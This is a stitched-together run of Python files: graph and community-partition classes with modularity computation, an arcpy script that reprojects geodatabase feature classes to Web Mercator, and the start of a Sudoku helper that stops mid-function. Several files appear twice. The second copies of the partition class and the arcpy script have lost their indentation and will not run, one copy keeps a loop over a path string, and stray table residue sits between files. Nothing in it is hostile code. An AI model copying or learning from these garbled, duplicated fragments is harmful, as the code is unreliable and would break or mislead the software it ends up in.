    WeightedUndirectedGraph._node_size: the node size of the graph;
    WeightedUndirectedGraph._edge_degree: the precomputed unweighted degree of each node in the graph;
    WeightedUndirectedGraph._size: the weighted edge size of the graph;
    WeightedUndirectedGraph._edge_size: the edge size of the graph.
    '''
    def __init__(self):
        '''
        Initialize the graph as an empty graph.
        '''
        self._graph = {}
        self._degree = {}
        self._node_weight = {}
        self._node_size = 0
        self._edge_degree = {}
        self._size = 0
        self._edge_size = 0
    def add_node(self, node, node_weight = 1):
        '''
        Add a node in the graph; a no-op when the node already exists
        (the existing node's weight is NOT updated).
        Parameters
        ----------
        node: the given index of the node
        node_weight: int, optional, default: 1, the weight of the node
        '''
        # Idiom fix: membership test on the dict itself instead of .keys().
        if node in self._graph:
            return
        self._graph[node] = {}
        self._node_weight[node] = node_weight
        self._degree[node] = 0
        self._edge_degree[node] = 0
        self._node_size += 1
    def add_edge(self, source, target, weight = 1):
        '''
        Add a (weighted) undirected edge in the graph; parallel edges are
        merged by summing their weights.
        Parameters
        ----------
        source: the source node of the edge, created if it does not exist;
        target: the target node of the edge, created if it does not exist;
        weight: int, optional, default: 1, the weight of the edge.
        '''
        self.add_node(source)
        self.add_node(target)
        self._graph[source][target] = self._graph[source].get(target, 0) + weight
        if source != target:
            self._graph[target][source] = self._graph[target].get(source, 0) + weight
        # A self-loop intentionally contributes twice to the node's degree
        # (standard convention, also used by the modularity computation).
        self._degree[source] += weight
        self._degree[target] += weight
        self._size += weight
        self._edge_size += 1
        self._edge_degree[source] += 1
        self._edge_degree[target] += 1
    def add_edges_from_list(self, edge_list):
        '''
        Add edges from an edge list.
        Parameters
        ----------
        edge_list: the given edge list, which should follow the format
                   [e1, e2, ..., en] where ei = [source_i, target_i, (weight_i)]
        '''
        for edge in edge_list:
            assert len(edge) == 2 or len(edge) == 3
            if len(edge) == 2:
                self.add_edge(edge[0], edge[1])
            else:
                self.add_edge(edge[0], edge[1], edge[2])
    def iter_nodes(self):
        '''
        Get an iterable over all nodes in the graph.
        Returns
        -------
        An iterable dict view of all nodes (iterating yields node ids).
        '''
        return self._graph
    def iter_edges(self, node):
        '''
        Get an iterable dict of all edges incident to the given node.
        Parameters
        ----------
        node: the target node.
        Returns
        -------
        The dict {neighbour: weight} of the node's incident edges.
        '''
        return self._graph[node]
    def degree(self, node):
        '''
        Get the weighted degree of the given node (0 for unknown nodes).
        Parameters
        ----------
        node: the target node.
        Returns
        -------
        The weighted degree of the node.
        '''
        return self._degree.get(node, 0)
    def edge_degree(self, node):
        '''
        Get the unweighted degree of the given node, i.e. the number of
        incident edge endpoints (0 for unknown nodes).
        Parameters
        ----------
        node: the target node.
        Returns
        -------
        The unweighted degree of the node.
        '''
        return self._edge_degree.get(node, 0)
    def node_weight(self, node):
        '''
        Get the weight of the given node.
        Parameters
        ----------
        node: the target node.
        Returns
        -------
        The node weight. Raises KeyError for unknown nodes (unlike degree()).
        '''
        return self._node_weight[node]
    def size(self):
        '''
        Get the weighted size of the graph, i.e. the sum of edge weights.
        Returns
        -------
        The sum of edge weights in the graph.
        '''
        return self._size
    def node_size(self):
        '''
        Get the number of nodes in the graph.
        Returns
        -------
        The node size of the graph.
        '''
        return self._node_size
    def edge_size(self):
        '''
        Get the unweighted size of the graph, i.e. the number of edges.
        Returns
        -------
        The number of edges in the graph.
        '''
        return self._edge_size
    def get_selfcycle(self, node):
        '''
        Get the weight of the self-cycle node-node (0 when absent).
        Parameters
        ----------
        node: int, the start and end node of the self-cycle.
        Returns
        -------
        The weight of the self-cycle started and ended at node.
        '''
        return self._graph[node].get(node, 0)
    def copy(self):
        '''
        Deep-copy the current object.
        Returns
        -------
        A copied object, fully independent of the original.
        '''
        return copy.deepcopy(self)
class GraphPartition(object):
    '''
    An object that records the partition of a given graph
    Members
    -------
    GraphPartition.graph: a WeightedUndirectedGraph object, the given graph;
    GraphPartition.resolution: float, optional, default: 1.0, the resolution of modularity;
    GraphPartition.m2: int, the total degree of the graph (twice the weighted size);
    GraphPartition.partition: dict, node -> community id;
    GraphPartition.nodes: list of list, the nodes contained in each community;
    GraphPartition.nodes_weight: list, the summation of node weights in each community;
    GraphPartition.degree: list, the degree of nodes in each community, used for modularity calculation;
    GraphPartition.inside_weight: list, the inside edge weight in each community, used for modularity calculation;
    GraphPartition.cluster_size: list, the size of each cluster partitioned in the graph;
    GraphPartition.num_clusters: int, the number of clusters in the partition.
    '''
    def __init__(self, graph, resolution = 1.0, initialize_singleton = True):
        '''
        Initialize the partition as an individual partition.
        Parameters
        ----------
        graph: a WeightedUndirectedGraph object, the graph we focus on;
        resolution: float, optional, default: 1.0, the resolution of modularity;
        initialize_singleton: bool, optional, default: True, whether to initialize the object as a singleton partition of the graph.
        '''
        super(GraphPartition, self).__init__()
        self.graph = graph.copy()
        self.resolution = resolution
        self.m2 = 2 * self.graph.size()
        self.partition = {}
        self.nodes = []
        self.nodes_weight = []
        self.degree = []
        self.inside_weight = []
        self.cluster_size = []
        self.num_clusters = 0
        if initialize_singleton:
            # Each node starts in its own community; a self-loop counts twice
            # toward the community's inside weight (both edge endpoints).
            for x in graph.iter_nodes():
                self.partition[x] = self.num_clusters
                self.nodes.append([x])
                self.nodes_weight.append(self.graph.node_weight(x))
                self.degree.append(graph.degree(x))
                self.inside_weight.append(self.graph.get_selfcycle(x) * 2)
                self.cluster_size.append(1)
                self.num_clusters += 1
    def get_community(self, x):
        '''
        Get the community of x in the given partition.
        Parameters
        ----------
        x: int, a given node in the graph.
        Returns
        -------
        the communities that node x lies in; if no communities is found, then return -1.
        '''
        return self.partition.get(x, -1)
    def assign_community(self, x, com):
        '''
        Assign the community of the node, incrementally maintaining all
        per-community aggregates.
        Parameters
        ----------
        x: int, a given node in the graph;
        com: int, the assigned community to the given node.
        '''
        if self.partition[x] == com:
            return
        if com >= self.num_clusters:
            raise ValueError('community number is not valid!')
        # Remove from old community, maintain self.nodes, self.degree, self.inside_weight, self.cluster_size
        old_com = self.partition[x]
        self.nodes[old_com].remove(x)
        self.degree[old_com] -= self.graph.degree(x)
        # Each edge from x to a node still in old_com leaves the community,
        # removing both endpoints' contributions (hence w + w).
        for y, w in self.graph.iter_edges(x).items():
            if self.partition[y] == old_com:
                self.inside_weight[old_com] -= w + w
        self.cluster_size[old_com] -= 1
        self.nodes_weight[old_com] -= self.graph.node_weight(x)
        # Add into new community, maintain self.nodes, self.degree, self.inside_weight, self.cluster_size
        # NOTE: self.partition[x] is updated BEFORE the edge scan so that a
        # self-loop of x is counted as inside the new community.
        self.partition[x] = com
        self.nodes[com].append(x)
        self.degree[com] += self.graph.degree(x)
        for y, w in self.graph.iter_edges(x).items():
            if self.partition[y] == com:
                self.inside_weight[com] += w + w
        self.cluster_size[com] += 1
        self.nodes_weight[com] += self.graph.node_weight(x)
    def insert_community(self, num = 1):
        '''
        Insert new empty communities.
        Parameters
        ----------
        num: int, optional, default: 1, the number of communities you want to insert.
        '''
        if type(num) is not int or num < 0:
            raise ValueError('num should be non-negative integers.')
        for _ in range(num):
            self.nodes.append([])
            self.nodes_weight.append(0)
            self.degree.append(0)
            self.inside_weight.append(0)
            self.cluster_size.append(0)
            self.num_clusters += 1
    def iter_communities(self):
        '''
        Get an iterative list of the non-empty communities in the partition,
        which is used to enumerate communities.
        Returns
        -------
        An iterative list of the communities in the partition.
        '''
        res = []
        for i in range(self.num_clusters):
            if self.cluster_size[i] > 0:
                res.append(i)
        return res
    def get_partition(self):
        '''
        Get the partition dict of the graph.
        Returns
        -------
        A partition dict (node -> community id).
        '''
        return self.partition
    def get_community_size(self, com):
        '''
        Get the size of the community.
        Parameters
        ----------
        com: int, the community.
        Returns
        -------
        The size of the community, 0 if the community not exists.
        '''
        return self.cluster_size[com] if com < self.num_clusters else 0
    def get_community_members(self, com):
        '''
        Get the members of the community.
        Parameters
        ----------
        com: int, the community.
        Returns
        -------
        The members of the community.
        '''
        return self.nodes[com] if com < self.num_clusters else []
    def get_community_nodes_weight(self, com):
        '''
        Get the weights of all nodes of the community.
        Parameters
        ----------
        com: int, the community.
        Returns
        -------
        The weight of all nodes of the community.
        '''
        return self.nodes_weight[com] if com < self.num_clusters else 0
    def is_singleton(self):
        '''
        Check whether the partition is a singleton partition.
        NOTE: an empty (size-0) community also makes this return False.
        Returns
        -------
        True if the partition is a singleton partition, False otherwise.
        '''
        for i in range(self.num_clusters):
            if self.cluster_size[i] != 1:
                return False
        return True
    def get_degree(self, com):
        '''
        Get the degree of the community.
        Parameters
        ----------
        com: int, the community.
        Returns
        -------
        The degree of the community.
        '''
        return self.degree[com] if com < self.num_clusters else 0
    def renumber(self):
        '''
        Renumber the partitions so community ids become dense (0..k-1),
        dropping empty communities.
        Returns
        -------
        The renumbered partition (a new GraphPartition object).
        '''
        res = GraphPartition(self.graph, self.resolution, initialize_singleton=False)
        renumber_mapping = {}
        # Copy each non-empty community into the next free slot of res.
        for com in self.iter_communities():
            new_com = res.num_clusters
            renumber_mapping[com] = new_com
            res.nodes.append(self.nodes[com].copy())
            res.nodes_weight.append(self.nodes_weight[com])
            res.degree.append(self.degree[com])
            res.inside_weight.append(self.inside_weight[com])
            res.cluster_size.append(self.cluster_size[com])
            res.num_clusters += 1
        for x in self.graph.iter_nodes().keys():
            res.partition[x] = renumber_mapping[self.partition[x]]
        return res
    def modularity(self, optimized = True):
        '''
        Compute the modularity of the current partition in the graph.
        Parameters
        ----------
        optimized: bool, optional, default: True, whether use the precomputed value to optimize the modularity calculation.
        Returns
        -------
        The modularity value Q of graph on the current partition.
        '''
        if optimized:
            Q = 0
            for community in self.iter_communities():
                Q += self.inside_weight[community] / self.m2 - self.resolution * (self.degree[community] / self.m2) ** 2
            return Q
        else:
            # Fall back to the module-level modularity(), which recomputes
            # everything from scratch (useful as a cross-check).
            return modularity(self.graph, self, self.resolution)
    def modularity_gain(self, x, com):
        '''
        Calculate the modularity gain if we assign com to the community of x.
        Parameters
        ----------
        x: int, a given node in the graph;
        com: int, the assigned community to the node x.
        Returns
        -------
        dQ, the modularity gain.
        '''
        old_com = self.partition[x]
        # Resolution-scaled change of the squared-degree terms for both the
        # community x leaves and the one it joins.
        dQ = (self.degree[com] / self.m2) ** 2 + (self.degree[old_com] / self.m2) ** 2
        dQ -= ((self.degree[com] + self.graph.degree(x)) / self.m2) ** 2 + ((self.degree[old_com] - self.graph.degree(x)) / self.m2) ** 2
        dQ = dQ * self.resolution
        # Change of the inside-weight terms; a self-loop of x stays inside
        # whichever community x is in, so its contribution cancels (skipped).
        for y, w in self.graph.iter_edges(x).items():
            if x == y:
                continue
            if self.partition[y] == com:
                dQ += (w + w) / self.m2
            elif self.partition[y] == old_com:
                dQ -= (w + w) / self.m2
        return dQ
    def copy(self):
        '''
        Copy the current object.
        Returns
        -------
        A copied object.
        '''
        return copy.deepcopy(self)
def modularity(graph, partition, resolution = 1.0):
    '''
    Compute the modularity of the partition in the graph from scratch
    (no reliance on the partition's precomputed aggregates).
    Parameters
    ----------
    graph: a WeightedUndirectedGraph object, the graph which will be decomposed;
    partition: a GraphPartition object, the partition of the given graph;
    resolution: float, optional, default: 1.0, the resolution of the modularity.
    Returns
    -------
    The modularity value of graph G on partition S, i.e., Q(G, S).
    '''
    # isinstance instead of exact type comparison: accepts subclasses while
    # still rejecting unrelated objects.
    assert isinstance(graph, WeightedUndirectedGraph)
    assert isinstance(partition, GraphPartition)
    m = graph.size()
    if m == 0:
        raise AttributeError('There should be at least one edge in the graph, otherwise the modularity value is undefined.')
    degree = {}
    inside_weight = {}
    for x in graph.iter_nodes():
        community = partition.get_community(x)
        degree[community] = degree.get(community, 0) + graph.degree(x)
        for y, w in graph.iter_edges(x).items():
            if partition.get_community(y) == community:
                inside_weight[community] = inside_weight.get(community, 0) + w
            if x == y:  # self-cycle: counts twice, like the two endpoints of a normal edge
                inside_weight[community] = inside_weight.get(community, 0) + w
    Q = 0  # The modularity value
    # (Garbled trailing residue "| Labs/Lab3/community/graphx.py | ..." removed
    # from the final return statement.)
    for community in partition.iter_communities():
        Q = Q + inside_weight.get(community, 0) / (2 * m) - resolution * (degree.get(community, 0) / (2 * m)) ** 2
    return Q
class WeightedUndirectedGraph(object):
    '''
    An object that records a weighted undirected graph.
    Members
    -------
    WeightedUndirectedGraph._graph: dict of dict, adjacency map node -> {neighbour: weight};
    WeightedUndirectedGraph._degree: the precomputed weighted degree of each node in the graph;
    WeightedUndirectedGraph._node_weight: the weight of each node in the graph;
    WeightedUndirectedGraph._node_size: the node size of the graph;
    WeightedUndirectedGraph._edge_degree: the precomputed unweighted degree of each node in the graph;
    WeightedUndirectedGraph._size: the weighted edge size of the graph;
    WeightedUndirectedGraph._edge_size: the edge size of the graph.
    '''
    def __init__(self):
        '''
        Initialize the graph as an empty graph.
        '''
        self._graph = {}
        self._degree = {}
        self._node_weight = {}
        self._node_size = 0
        self._edge_degree = {}
        self._size = 0
        self._edge_size = 0
    def add_node(self, node, node_weight = 1):
        '''
        Add a node in the graph; a no-op when the node already exists
        (the existing node's weight is NOT updated).
        Parameters
        ----------
        node: the given index of the node
        node_weight: int, optional, default: 1, the weight of the node
        '''
        # Idiom fix: membership test on the dict itself instead of .keys().
        if node in self._graph:
            return
        self._graph[node] = {}
        self._node_weight[node] = node_weight
        self._degree[node] = 0
        self._edge_degree[node] = 0
        self._node_size += 1
    def add_edge(self, source, target, weight = 1):
        '''
        Add a (weighted) undirected edge in the graph; parallel edges are
        merged by summing their weights.
        Parameters
        ----------
        source: the source node of the edge, created if it does not exist;
        target: the target node of the edge, created if it does not exist;
        weight: int, optional, default: 1, the weight of the edge.
        '''
        self.add_node(source)
        self.add_node(target)
        self._graph[source][target] = self._graph[source].get(target, 0) + weight
        if source != target:
            self._graph[target][source] = self._graph[target].get(source, 0) + weight
        # A self-loop intentionally contributes twice to the node's degree
        # (standard convention, also used by the modularity computation).
        self._degree[source] += weight
        self._degree[target] += weight
        self._size += weight
        self._edge_size += 1
        self._edge_degree[source] += 1
        self._edge_degree[target] += 1
    def add_edges_from_list(self, edge_list):
        '''
        Add edges from an edge list.
        Parameters
        ----------
        edge_list: the given edge list, which should follow the format
                   [e1, e2, ..., en] where ei = [source_i, target_i, (weight_i)]
        '''
        for edge in edge_list:
            assert len(edge) == 2 or len(edge) == 3
            if len(edge) == 2:
                self.add_edge(edge[0], edge[1])
            else:
                self.add_edge(edge[0], edge[1], edge[2])
    def iter_nodes(self):
        '''
        Get an iterable over all nodes in the graph.
        Returns
        -------
        An iterable dict view of all nodes (iterating yields node ids).
        '''
        return self._graph
    def iter_edges(self, node):
        '''
        Get an iterable dict of all edges incident to the given node.
        Parameters
        ----------
        node: the target node.
        Returns
        -------
        The dict {neighbour: weight} of the node's incident edges.
        '''
        return self._graph[node]
    def degree(self, node):
        '''
        Get the weighted degree of the given node (0 for unknown nodes).
        Parameters
        ----------
        node: the target node.
        Returns
        -------
        The weighted degree of the node.
        '''
        return self._degree.get(node, 0)
    def edge_degree(self, node):
        '''
        Get the unweighted degree of the given node, i.e. the number of
        incident edge endpoints (0 for unknown nodes).
        Parameters
        ----------
        node: the target node.
        Returns
        -------
        The unweighted degree of the node.
        '''
        return self._edge_degree.get(node, 0)
    def node_weight(self, node):
        '''
        Get the weight of the given node.
        Parameters
        ----------
        node: the target node.
        Returns
        -------
        The node weight. Raises KeyError for unknown nodes (unlike degree()).
        '''
        return self._node_weight[node]
    def size(self):
        '''
        Get the weighted size of the graph, i.e. the sum of edge weights.
        Returns
        -------
        The sum of edge weights in the graph.
        '''
        return self._size
    def node_size(self):
        '''
        Get the number of nodes in the graph.
        Returns
        -------
        The node size of the graph.
        '''
        return self._node_size
    def edge_size(self):
        '''
        Get the unweighted size of the graph, i.e. the number of edges.
        Returns
        -------
        The number of edges in the graph.
        '''
        return self._edge_size
    def get_selfcycle(self, node):
        '''
        Get the weight of the self-cycle node-node (0 when absent).
        Parameters
        ----------
        node: int, the start and end node of the self-cycle.
        Returns
        -------
        The weight of the self-cycle started and ended at node.
        '''
        return self._graph[node].get(node, 0)
    def copy(self):
        '''
        Deep-copy the current object.
        Returns
        -------
        A copied object, fully independent of the original.
        '''
        return copy.deepcopy(self)
class GraphPartition(object):
'''
An object that records the partition of a given graph
Members
-------
GraphPartition.graph: networkx.Graph object, the given graph;
GraphPartition.resolution: float, optional, default: 1.0, the resolution of modularity;
GraphPartition.m2: int, the total degree of the graph;
GraphPartition.partition: dict, the partition of the graph;
GraphPartition.nodes: list of list, the nodes contained in each community;
GraphPartition.nodes_weight: list, the summation of node weights in each community;
GraphPartition.degree: list, the degree of nodes in each community, used for modularity calculation;
GraphPartition.inside_weight: list, the inside edge weight in each community, used for modularity calculation;
GraphPartition.cluster_size: list, the size of each cluster partitioned in the graph;
GraphPartition.num_clusters: int, the number of clusters in the partition.
'''
def __init__(self, graph, resolution = 1.0, initialize_singleton = True):
'''
Initialize the partition as an individual partition.
Parameters
----------
graph: a WeightedUndirectedGraph object, the graph we focus on;
resolution: float, optional, default: 1.0, the resolution of modularity;
initialize_singleton: bool, optional, defualt: True, whether to initialize the object as a singleton partition of the graph.
'''
super(GraphPartition, self).__init__()
self.graph = graph.copy()
self.resolution = resolution
self.m2 = 2 * self.graph.size()
self.partition = {}
self.nodes = []
self.nodes_weight = []
self.degree = []
self.inside_weight = []
self.cluster_size = []
self.num_clusters = 0
if initialize_singleton:
for x in graph.iter_nodes():
self.partition[x] = self.num_clusters
self.nodes.append([x])
self.nodes_weight.append(self.graph.node_weight(x))
self.degree.append(graph.degree(x))
self.inside_weight.append(self.graph.get_selfcycle(x) * 2)
self.cluster_size.append(1)
self.num_clusters += 1
def get_community(self, x):
'''
Get the community of x in the given partition.
Parameters
----------
x: int, a given node in the graph.
Returns
-------
the communities that node x lies in; if no communities is found, then return -1.
'''
return self.partition.get(x, -1)
def assign_community(self, x, com):
'''
Assign the community of the node.
Parameters
----------
x: int, a given node in the graph;
com: int, the assigned community to the given node.
'''
if self.partition[x] == com:
return
if com >= self.num_clusters:
raise ValueError('community number is not valid!')
# Remove from old community, maintain self.nodes, self.degree, self.inside_weight, self.cluster_size
old_com = self.partition[x]
self.nodes[old_com].remove(x)
self.degree[old_com] -= self.graph.degree(x)
for y, w in self.graph.iter_edges(x).items():
if self.partition[y] == old_com:
self.inside_weight[old_com] -= w + w
self.cluster_size[old_com] -= 1
self.nodes_weight[old_com] -= self.graph.node_weight(x)
# Add into new community, maintain self.nodes, self.degree, self.inside_weight, self.cluster_size
self.partition[x] = com
self.nodes[com].append(x)
self.degree[com] += self.graph.degree(x)
for y, w in self.graph.iter_edges(x).items():
if self.partition[y] == com:
self.inside_weight[com] += w + w
self.cluster_size[com] += 1
self.nodes_weight[com] += self.graph.node_weight(x)
def insert_community(self, num = 1):
'''
Insert new empty communities.
Parameters
----------
num: int, optional, default: 1, the number of communities you want to insert.
'''
if type(num) is not int or num < 0:
raise ValueError('num should be non-negative integers.')
for _ in range(num):
self.nodes.append([])
self.nodes_weight.append(0)
self.degree.append(0)
self.inside_weight.append(0)
self.cluster_size.append(0)
self.num_clusters += 1
def iter_communities(self):
'''
Get an iterative list of the communities in the partition, which is used to enumerate communities.
Returns
-------
An iterative list of the communities in the partition.
'''
res = []
for i in range(self.num_clusters):
if self.cluster_size[i] > 0:
res.append(i)
return res
def get_partition(self):
'''
Get the partition dict of the graph.
Returns
-------
A partition dict.
'''
return self.partition
def get_community_size(self, com):
'''
Get the size of the community.
Parameters
----------
com: int, the community.
Returns
-------
The size of the community, 0 if the community not exists.
'''
return self.cluster_size[com] if com < self.num_clusters else 0
def get_community_members(self, com):
'''
Get the members of the community.
Parameters
----------
com: int, the community.
Returns
-------
The members of the community.
'''
return self.nodes[com] if com < self.num_clusters else []
def get_community_nodes_weight(self, com):
'''
Get the weights of all nodes of the community.
Parameters
----------
com: int, the community.
Returns
-------
The weight of all nodes of the community.
'''
return self.nodes_weight[com] if com < self.num_clusters else 0
def is_singleton(self):
'''
Check whether the partition is a singleton partition.
Returns
-------
True if the partition is a singleton partition, False otherwise.
'''
for i in range(self.num_clusters):
if self.cluster_size[i] != 1:
return False
return True
def get_degree(self, com):
    '''
    Get the degree of the community.

    Parameters
    ----------
    com: int, the community.

    Returns
    -------
    The degree of the community (0 for an unknown community id).
    '''
    return 0 if com >= self.num_clusters else self.degree[com]
def renumber(self):
    '''
    Renumber the partitions.

    Returns
    -------
    A new GraphPartition whose non-empty communities are renumbered
    consecutively from 0; node membership is preserved.
    '''
    compact = GraphPartition(self.graph, self.resolution, initialize_singleton=False)
    old_to_new = {}
    # Copy the per-community statistics of every non-empty community,
    # assigning fresh consecutive ids in iteration order.
    for old_com in self.iter_communities():
        old_to_new[old_com] = compact.num_clusters
        compact.num_clusters += 1
        compact.nodes.append(list(self.nodes[old_com]))
        compact.nodes_weight.append(self.nodes_weight[old_com])
        compact.degree.append(self.degree[old_com])
        compact.inside_weight.append(self.inside_weight[old_com])
        compact.cluster_size.append(self.cluster_size[old_com])
    # Remap every node's community id to its compacted value.
    for node in self.graph.iter_nodes():
        compact.partition[node] = old_to_new[self.partition[node]]
    return compact
def modularity(self, optimized = True):
    '''
    Compute the modularity of the current partition in the graph.

    Parameters
    ----------
    optimized: bool, optional, default: True, whether use the precomputed value to optimize the modularity calculation.

    Returns
    -------
    The modularity value Q of graph on the current partition.
    '''
    if not optimized:
        # Fall back to the module-level reference implementation.
        return modularity(self.graph, self, self.resolution)
    total = 0
    for com in self.iter_communities():
        total += self.inside_weight[com] / self.m2 - self.resolution * (self.degree[com] / self.m2) ** 2
    return total
def modularity_gain(self, x, com):
    '''
    Calculate the modularity gain if we assign com to the community of x.

    Parameters
    ----------
    x: int, a given node in the graph;
    com: int, the assigned community to the node x.

    Returns
    -------
    dQ, the modularity gain.
    '''
    src = self.partition[x]
    m2 = self.m2
    k_x = self.graph.degree(x)
    # Degree-penalty change: target/source pair before the move minus the
    # same pair after x's degree is transferred from `src` to `com`.
    penalty = (self.degree[com] / m2) ** 2 + (self.degree[src] / m2) ** 2
    penalty -= ((self.degree[com] + k_x) / m2) ** 2 + ((self.degree[src] - k_x) / m2) ** 2
    dQ = penalty * self.resolution
    # Edge-weight change: links from x into the target/source communities
    # (self-loops are unaffected by the move).
    for y, w in self.graph.iter_edges(x).items():
        if y == x:
            continue
        if self.partition[y] == com:
            dQ += (w + w) / m2
        elif self.partition[y] == src:
            dQ -= (w + w) / m2
    return dQ
def copy(self):
    '''
    Copy the current object.

    Returns
    -------
    A deep copy sharing no mutable state with this partition.
    '''
    duplicate = copy.deepcopy(self)
    return duplicate
def modularity(graph, partition, resolution = 1.0):
    '''
    Compute the modularity of the partition in the graph

    Parameters
    ----------
    graph: a WeightedUndirectedGraph object, the graph which will be decomposed;
    partition: a GraphPartition object, the partition of the given graph;
    resolution: float, optional, default: 1.0, the resolution of the modularity.

    Returns
    -------
    The modularity value of graph G on partition S, i.e., Q(G, S).
    '''
    assert type(graph) is WeightedUndirectedGraph
    assert type(partition) is GraphPartition
    m = graph.size()
    if m == 0:
        raise AttributeError('There should be at least one edge in the graph, otherwise the modularity value is undefined.')
    degree_sum = {}
    internal = {}
    # Accumulate each community's total degree and internal edge weight.
    for node in graph.iter_nodes():
        com = partition.get_community(node)
        degree_sum[com] = degree_sum.get(com, 0) + graph.degree(node)
        for nbr, w in graph.iter_edges(node).items():
            if partition.get_community(nbr) == com:
                internal[com] = internal.get(com, 0) + w
                if nbr == node:
                    # A self-loop is visited only once, so count it twice.
                    internal[com] = internal.get(com, 0) + w
    Q = 0  # The modularity value
    for com in partition.iter_communities():
        Q = Q + internal.get(com, 0) / (2 * m) - resolution * (degree_sum.get(com, 0) / (2 * m)) ** 2
    return Q
import arcpy
import sys
from os.path import join

arcpy.env.geographicTransformations = 'NAD_1983_to_WGS_1984_5'

# Base folder from the command line, falling back to an interactive prompt.
# NOTE(review): raw_input implies this targets Python 2 (ArcGIS Desktop).
try:
    base_folder = sys.argv[1]
except IndexError:
    base_folder = raw_input('base folder: ')

print('creating new database')
# os.path.join keeps the paths valid whether or not base_folder carries a
# trailing separator (plain string concatenation required one).
new_db = join(base_folder, 'QueryLayers_NEW.gdb')
old_db = join(base_folder, 'QueryLayers.gdb')
new_ref_db = join(base_folder, 'ReferenceData_NEW.gdb')
old_ref_db = join(base_folder, 'ReferenceData.gdb')

# Recreate the target geodatabases from scratch.
if arcpy.Exists(new_db):
    arcpy.Delete_management(new_db)
arcpy.CreateFileGDB_management(base_folder, 'QueryLayers_NEW.gdb')
if arcpy.Exists(new_ref_db):
    arcpy.Delete_management(new_ref_db)
arcpy.CreateFileGDB_management(base_folder, 'ReferenceData_NEW.gdb')

# Collect relationship class names while copying, so they can be rebuilt
# once every participating table/feature class exists in the new database.
relationship_class_names = set([])
arcpy.env.workspace = old_db

print('FEATURE CLASSES')
for fc in arcpy.ListFeatureClasses():
    print(fc)
    # Reproject every feature class to Web Mercator (EPSG:3857).
    arcpy.Project_management(fc, join(new_db, fc), arcpy.SpatialReference(3857))
    relationship_class_names.update(arcpy.Describe(fc).relationshipClassNames)

print('TABLES')
for tbl in arcpy.ListTables():
    print(tbl)
    arcpy.CopyRows_management(tbl, join(new_db, tbl))
    relationship_class_names.update(arcpy.Describe(tbl).relationshipClassNames)

print('RELATIONSHIP CLASSES')
# Map arcpy Describe cardinality values onto the keywords expected by
# CreateRelationshipClass_management.
card_lu = {'OneToOne': 'ONE_TO_ONE',
           'OneToMany': 'ONE_TO_MANY',
           'ManyToMany': 'MANY_TO_MANY'}
arcpy.env.workspace = new_db
for rc in relationship_class_names:
    print(rc)
    rc_desc = arcpy.Describe(join(old_db, rc))
    keys = {}
    for k in rc_desc.originClassKeys:
        keys[k[1]] = k[0]
    if len(rc_desc.destinationClassKeys) > 0:
        # Destination keys are not recreated below; flag them loudly.
        print('DESTINATION KEYS!!!')
    arcpy.CreateRelationshipClass_management(join(new_db, rc_desc.originClassNames[0]),
                                             join(new_db, rc_desc.destinationClassNames[0]),
                                             rc,
                                             'SIMPLE',
                                             rc_desc.forwardPathLabel,
                                             rc_desc.backwardPathLabel,
                                             rc_desc.notification.upper(),
                                             card_lu[rc_desc.cardinality],
                                             'NONE',
                                             keys['OriginPrimary'],
                                             keys['OriginForeign'])

print('REFERENCE DATA')
# BUG FIX: the original iterated `for r in new_ref_db:` — the characters of
# a path string — and projected the stale `fc` variable on every pass.
# List the feature classes of the old reference database instead.
arcpy.env.workspace = old_ref_db
for r in arcpy.ListFeatureClasses():
    print(r)
    arcpy.Project_management(r, join(new_ref_db, r), arcpy.SpatialReference(3857))
print('done')
import sys
from os.path import join
arcpy.env.geographicTransformations = 'NAD_1983_to_WGS_1984_5'
try:
base_folder = sys.argv[1]
except:
base_folder = raw_input('base folder: ')
print('creating new database')
new_db = base_folder + 'QueryLayers_NEW.gdb'
old_db = base_folder + 'QueryLayers.gdb'
new_ref_db = base_folder + 'ReferenceData_NEW.gdb'
old_ref_db = base_folder + 'ReferenceData.gdb'
if arcpy.Exists(new_db):
arcpy.Delete_management(new_db)
arcpy.CreateFileGDB_management(base_folder, 'QueryLayers_NEW.gdb')
if arcpy.Exists(new_ref_db):
arcpy.Delete_management(new_ref_db)
arcpy.CreateFileGDB_management(base_folder, 'ReferenceData_NEW.gdb')
relationship_class_names = set([])
arcpy.env.workspace = old_db
print('FEATURE CLASSES')
for fc in arcpy.ListFeatureClasses():
print(fc)
arcpy.Project_management(fc, join(new_db, fc), arcpy.SpatialReference(3857))
relationship_class_names.update(arcpy.Describe(fc).relationshipClassNames)
print('TABLES')
for tbl in arcpy.ListTables():
print(tbl)
arcpy.CopyRows_management(tbl, join(new_db, tbl))
relationship_class_names.update(arcpy.Describe(tbl).relationshipClassNames)
print('RELATIONSHIP CLASSES')
card_lu = {'OneToOne': 'ONE_TO_ONE',
'OneToMany': 'ONE_TO_MANY',
'ManyToMany': 'MANY_TO_MANY'}
arcpy.env.workspace = new_db
for rc in relationship_class_names:
print(rc)
rc_desc = arcpy.Describe(join(old_db, rc))
keys = {}
for k in rc_desc.originClassKeys:
keys[k[1]] = k[0]
if len(rc_desc.destinationClassKeys) > 0:
print('DESTINATION KEYS!!!')
arcpy.CreateRelationshipClass_management(join(new_db, rc_desc.originClassNames[0]),
join(new_db, rc_desc.destinationClassNames[0]),
rc,
'SIMPLE',
rc_desc.forwardPathLabel,
rc_desc.backwardPathLabel,
rc_desc.notification.upper(),
card_lu[rc_desc.cardinality],
'NONE',
keys['OriginPrimary'],
keys['OriginForeign'])
print('REFERENCE DATA')
arcpy.env.workspace = old_ref_db
for r in new_ref_db:
print(r)
arcpy.Project_management(r, join(new_ref_db, fc), arcpy.SpatialReference(3857))
print('done') | 0.155046 | 0.082438 |
# 9x9 Sudoku grid used as the demo input; 0 marks an empty cell.
example_grid = [
[5,0,0,0,0,7,0,0,0]
,[9,2,6,5,0,0,0,0,0]
,[3,0,0,8,0,9,0,2,0]
,[4,0,0,0,2,0,0,3,5]
,[0,3,5,1,0,4,9,7,0]
,[8,6,0,0,5,0,0,0,4]
,[0,4,0,3,0,8,0,0,2]
,[0,0,0,0,0,5,6,9,3]
,[0,0,0,6,0,0,0,0,7]]
def print_grid(grid):
    """Print the grid, one row per line."""
    for current_row in grid:
        print(current_row)
def get_indices_of_empty_cells(grid):
    """Return (row, col) pairs of every empty (0) cell, in row-major order."""
    empty = []
    for row in range(9):
        for col in range(9):
            if grid[row][col] == 0:
                empty.append((row, col))
    return empty
def get_rows_with_empty_cells(grid):
    """For each empty cell (row-major order), return a copy of that cell's full row."""
    result = []
    for (row, _col) in get_indices_of_empty_cells(grid):
        result.append([grid[row][col] for col in range(9)])
    return result
def get_columns_with_empty_cells(grid):
